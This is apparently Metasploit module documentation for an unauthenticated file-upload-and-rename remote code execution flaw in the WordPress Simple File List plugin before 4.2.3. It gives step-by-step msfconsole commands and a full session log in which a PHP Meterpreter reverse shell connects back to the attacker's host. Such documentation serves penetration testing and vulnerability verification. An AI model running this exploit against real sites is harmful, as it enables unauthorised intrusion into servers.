## Vulnerable Application

The Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote, unauthenticated attackers to
upload files within a controlled list of extensions. However, the rename function does not conform to the file extension
restrictions, thus allowing arbitrary PHP code to be uploaded first as a PNG file then renamed to use the PHP extension
and executed.

Download simpe-file-list [4.2.2](https://downloads.wordpress.org/plugin/simple-file-list.4.2.2.zip) or another
version < 4.2.3 from [here](https://wordpress.org/plugins/simple-file-list/advanced/).

Install and enable the plugin, no additional configuration is required.

## Verification Steps

1. Install the application
1. Start msfconsole
1. Do: `use exploit/multi/http/wp_simple_file_list_rce`
1. Do: `set rhosts [ip]`
1. Do: `set lhost [ip]`
1. Do: `run`
1. You should get a shell.

## Options

## Scenarios

### Simple File List 4.2.2 on Wordpress 5.5.3 on Debian 10.6

```
msf6 > use exploit/multi/http/wp_simple_file_list_rce 
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_simple_file_list_rce) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf6 exploit(multi/http/wp_simple_file_list_rce) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf6 exploit(multi/http/wp_simple_file_list_rce) > exploit

[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Attempting to upload the PHP payload as a PNG file
[+] PNG payload successfully uploaded
[*] Attempting to rename fkzUTKAp.png to fkzUTKAp.php
[+] Successfully renamed fkzUTKAp.png to fkzUTKAp.php
[*] Triggering shell
[*] Sending stage (39282 bytes) to 2.2.2.2
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:38366) at 2020-11-25 09:55:37 -0500
[+] Deleted fkzUTKAp.php

meterpreter > getuid
Server username: daemon (1)
meterpreter > sysinfo
Computer    : debian
OS          : Linux debian 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64
Meterpreter : php/linux
meterpreter >
```
